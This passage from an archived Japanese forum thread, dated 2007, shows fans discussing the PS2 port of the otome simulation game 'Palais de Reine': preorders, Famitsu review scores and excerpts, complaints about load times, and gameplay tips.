イベントもなかなかリアリティに富んでいるようで楽しみだ

144 :名無しって呼んでいいか?:2007/10/09(火) 20:48:12 ID:???
>>142
そ、そんなイベントはなかったよ…な…?
一瞬隠しイベでも有ったのかと思ってしまったじゃまいか。

PS2版、恋愛系のイベント増えてると良いな。

145 :名無しって呼んでいいか?:2007/10/09(火) 21:19:53 ID:???
>>144
何言ってるの?
ちゃんとあるよ
まぁこれでも飲んでゆっくり語り合おうじゃないか(^ω^)っ旦
はなしはそれからだ

146 :名無しって呼んでいいか?:2007/10/09(火) 21:31:05 ID:???
出された茶を飲むなよwwww

147 :名無しって呼んでいいか?:2007/10/09(火) 22:48:30 ID:???
予約してきた!密林にて。
とりあえず多少遅れても許す!無事に届けてくれ。。。。

148 :名無しって呼んでいいか?:2007/10/09(火) 23:01:21 ID:???
PS2版公式サイトのやる気が目に見えて落ちていってるのが気になるな

149 :名無しって呼んでいいか?:2007/10/10(水) 00:54:31 ID:???
PS2版公式サイトといえば、システム紹介が未だに完成されてないよね。


150 :名無しって呼んでいいか?:2007/10/10(水) 01:26:39 ID:???
製品のシステム(のチェック)も未完s

151 :名無しって呼んでいいか?:2007/10/10(水) 02:04:46 ID:???
ロード時間が短めでありますように(−人−)

152 :名無しって呼んでいいか?:2007/10/10(水) 02:19:32 ID:???
>>132
あれっ 私がここにいるw
同じく、もふもふはもう手に入らないかもしれないから予約組だよ…

153 :名無しって呼んでいいか?:2007/10/10(水) 02:45:56 ID:???
>>152
ミロワール乙w

154 :名無しって呼んでいいか?:2007/10/10(水) 08:23:56 ID:???
PS版の攻略本って出るかな

155 :名無しって呼んでいいか?:2007/10/10(水) 08:29:05 ID:???
ぜひ出て欲しいところだw

156 :名無しって呼んでいいか?:2007/10/10(水) 15:22:58 ID:???
260 名前:アイマス ◆H9P/8vfBbE :2007/10/10(水) 11:20:52 ID:YHhir0i0
おはこんばんちわ

おしゃれな仔犬DS 7、6、6、6
ウィナーズサークル 7、7、7、7
ソニックラッシュアドベンチャー 8、7、8、9

スパイダーマン3(PS2) 7、7、7、7
スパイダーマン3(PS3) 8、8、8、7
パレドゥレーヌ 6、7、6、7
シーマン2 7、7、7、8
ギャラクシーエンジェル2 7、6、7、7
ゾイドオルタナティブ 7、6、6、6
ビューティフル塊魂 8、8、8、8

ファミ通の点数は微妙だな

157 :名無しって呼んでいいか?:2007/10/10(水) 19:46:14 ID:???
こういう感じのゲームをやり慣れてる人からするとぬるいんじゃないかね?
ゲーム性云々よりも着せ替えが楽しいw

158 :名無しって呼んでいいか?:2007/10/10(水) 20:26:40 ID:???
>>156
どうせ宰相やジジイやピザを攻略なんてしてもおるまい

159 :名無しって呼んでいいか?:2007/10/10(水) 20:32:49 ID:???
エクレール、ファミ痛編集部に差し入れを送ってさしあげて

160 :名無しって呼んでいいか?:2007/10/10(水) 20:44:04 ID:???
かしこまりました(^ω^)っ旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦

161 :名無しって呼んでいいか?:2007/10/10(水) 20:46:54 ID:???
合点承知ですわ、姫様!w


まあ、何周もしてこそ楽しいスルメゲーの類は
元々高評価って望めないんだろうしこんなもんっしょ。

162 :名無しって呼んでいいか?:2007/10/10(水) 20:48:05 ID:???
ごめ、リロってなかったらかぶった。

163 :名無しって呼んでいいか?:2007/10/10(水) 20:58:09 ID:???
むしろゲーマガの以下略。で取り上げてほしい

164 :名無しって呼んでいいか?:2007/10/10(水) 21:48:28 ID:???
金投入しないで6767なら上出来だと思うんだけどね
つーか、レビュワーが毒殺プレイをしたかどうかが気になるw

165 :名無しって呼んでいいか?:2007/10/10(水) 22:00:21 ID:???
お、公式に声優インタビューktkr

これがカウントダウンイベントになるのかな?

166 :名無しって呼んでいいか?:2007/10/10(水) 23:02:35 ID:???
>>156
あそこの点数は金のちry

167 :名無しって呼んでいいか?:2007/10/10(水) 23:10:03 ID:???
やたらいい点数だと金のryだろうけど、可もなく不可もない点数だな
コメントが気になる

168 :名無しって呼んでいいか?:2007/10/10(水) 23:40:56 ID:???
声優インタビューはいいんだが、
なんでバナーがあの二人なんだwww

( ゚∀゚)o彡゚ 宰相の中の人!宰相の中の人!

169 :名無しって呼んでいいか?:2007/10/10(水) 23:58:25 ID:???
バナー見たよ
凄い組み合わせだw
あのバナーも毎日変われば面白いのにwww

170 :名無しって呼んでいいか?:2007/10/11(木) 01:21:59 ID:???
公式、出迎えるキャラがいつも違うんだね。
あまり行かないので気付かなかった。
しかも今日はピザww いや好きなんだが。
ゲーム内容知らずに来た人は、出迎え人によって印象変わりそうだなw

171 :名無しって呼んでいいか?:2007/10/11(木) 09:36:17 ID:???
PS2版で盛り上がっているところ悪いのだけど
教えてください。
深遠の手鏡と美貌の果実がそれぞれ情報9、経済9になっていても
出てきてくれないのだけどなにか他に見落としていることがあるのだろうか?


172 :名無しって呼んでいいか?:2007/10/11(木) 14:55:25 ID:???
>>171
複数のバロメータが同時に9になると、上のほうのヤツが
優先されるっぽいですよ、殿下。
狙ってるバロメータが最初に9になるように投資すれば、
手に入りますよ。

173 :名無しって呼んでいいか?:2007/10/11(木) 20:48:13 ID:???
>>172
ありがとう!
いつも社会と栄華ばかり出てきて
なぜ情報や社会は出てこないのか不思議だったのです。
情報と経済を最初に9になるようにがんばって見ます。

174 :名無しって呼んでいいか?:2007/10/12(金) 00:31:25 ID:???
ガルスタで新規スチルを見ておらワクワクしてきたぞ!

175 :名無しって呼んでいいか?:2007/10/12(金) 01:25:49 ID:???
声優インタビュー毎日更新なんだな。wktk

>>169
…見間違いだったらスマン。本当にバナーの組み合わせ変わってないか?

176 :名無しって呼んでいいか?:2007/10/12(金) 02:19:53 ID:???
昨日は少年とムキムキ
今日はフェイスペインティングと子持ち
明日は熟女と黒貴族と予想

177 :名無しって呼んでいいか?:2007/10/12(金) 09:41:25 ID:???
移植版でも着せ替え反映されないのか。
青のアルルカン嫌いじゃないが・・。
ガッカリですよ、殿下!

178 :名無しって呼んでいいか?:2007/10/12(金) 09:55:15 ID:???
ヴァルター役の人の声優インタビュー、Q2の
>演じられた〜

>ゲームをプレイされる〜
ところの回答が逆じゃない?質問と答えが微妙にかみ合ってないw

179 :名無しって呼んでいいか?:2007/10/12(金) 10:09:36 ID:???
>>177
全ての衣装をスチルに反映させるのは無理だろうけど、
特別な衣装を身につけたときだけ変化・発生するイベントは欲しかった

180 :名無しって呼んでいいか?:2007/10/12(金) 10:43:11 ID:???
>>178
今見たら直ってた
でも声優の名前が間違ってる
波多野じゃなくて羽多野だったはず

181 :名無しって呼んでいいか?:2007/10/12(金) 10:58:11 ID:???
ファミ通立って読んできた
点数は置いておくとして
ロード長い、レスポンス悪い、着替えや模様替えが反映されないなどが書いてあった
ネガティブ方面の評価は割りと信頼できるからなぁ……ムムム

182 :名無しって呼んでいいか?:2007/10/12(金) 11:51:42 ID:???
着せ替え反映はかなり残念だがこの際諦めるとして、ロード長いのは…。
サクサクターン進めてくタイプのゲームでロード長い、レスポンス悪いのは厳しい。
大体そんな容量食う内容でもなくないか?

183 :名無しって呼んでいいか?:2007/10/12(金) 11:56:06 ID:???
ネオアンジェとまではいかなくてもサクサクロードはこの手のゲームには必須なのに……
伝説のロード地獄ゲームのマグナカタル並みだったらしねっていうかロード待ちでラーメンが出来る

184 :名無しって呼んでいいか?:2007/10/12(金) 12:11:54 ID:???
PS2でロードが長いのは仕方ないでしょ
PCからの移植でサクサク動くゲームって方が少ないと思うよ?


185 :名無しって呼んでいいか?:2007/10/12(金) 12:20:26 ID:???
もう一週間きったのか
konmzamaだからもっとかかるだろうけど

自分はPSでプレイできるだけで十分ありがたい。

186 :名無しって呼んでいいか?:2007/10/12(金) 13:04:19 ID:???
着せ替え反映はショックだけど追加分に期待しとく

187 :名無しって呼んでいいか?:2007/10/12(金) 14:03:41 ID:???
>>181
ロード長い、レスポンス悪いか…
買うには悩みどころだな
インターチャネルだと、そんな予感はしたんだが

188 :名無しって呼んでいいか?:2007/10/12(金) 14:05:21 ID:???
ファミ痛買ってきた。以下は各レビューからの抜粋。
・ゲームの内容うんぬんのまえに、画面切り替えのレスポンスが
あまりよくなく、プレイすること自体に、少々ストレスを感じる。
(中略)委任が可能という親切設計だし、グラフィックはきれいだし、
やり込み要素も多い。非常にもったいない。

・乙女ゲーですが、シミュレーション部分はしっかりとした作り。
(中略)ただ、読み込みが長めだったり、一部、情報が見づらかったり
と細々とした不満はあります。

・キャラとイベントが豊富で、それらが最後までモチベーションを
高めてくれます。(中略)ただ、キャラへの好感度や自分への評価が
把握しにくく、どう行動すべきか戸惑うことも。着せ替えや部屋の模様替えが、
本編に反映されないのは残念。

・個性豊かな騎士の面々と、それにまつわる豊富なイベントのおかげで、
何回も遊べる。(中略)効果を実感しづらいコマンドや隠しパラメーターが
多く、戸惑うことも。また、キーレスポンスの鈍さも気になった。

189 :名無しって呼んでいいか?:2007/10/12(金) 14:07:53 ID:???
>>188
乙。
レビュアーの殆どがシステムについて触れてるのか。
着せ替えとかが反映されないのはもったいないな。

190 :名無しって呼んでいいか?:2007/10/12(金) 14:14:28 ID:???
PC版で今でも楽しんでるけど
着せ替えの反映があるんだったら買おうかと様子見てたのになぁ 残念

191 :名無しって呼んでいいか?:2007/10/12(金) 14:49:34 ID:???
>>188
乙女乙
ロードがどれくらいかだな…
非常にもったいないという評価が鋭い

192 :名無しって呼んでいいか?:2007/10/12(金) 15:06:23 ID:???
PS2でも、極力ロード時間を抑える方法はあるけど
そういう手は講じてないという事なのか、あるいはプログラムの組み方が悪いのか…
やり込みゲーでロード長かったら、人によっては糞ゲーだろうに。
惜しい事になりそうだね…

193 :名無しって呼んでいいか?:2007/10/12(金) 15:11:40 ID:???
アビスぐらいまでなら耐えられるけどな…
でもロードは早ければ早いほうがいいよ

194 :名無しって呼んでいいか?:2007/10/12(金) 15:12:33 ID:???
>>188
ゲーム内容についてはかなり的を射た内容だね。
システム面は覚悟しといた方がいいな…。
パレドゥ好きだし、追加イベント楽しみだし、是非次に繋げて欲しいから買うけど、
PS版からの新規殿下がPC版殿下のように繰り返しプレイしまくりのスルメ的楽しみ方ができるかどうかは微妙そう。

195 :名無しって呼んでいいか?:2007/10/12(金) 15:34:43 ID:???
移植したメーカーの問題だろうな
多分買うだろうけど、実際どれくらいのものか

44 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)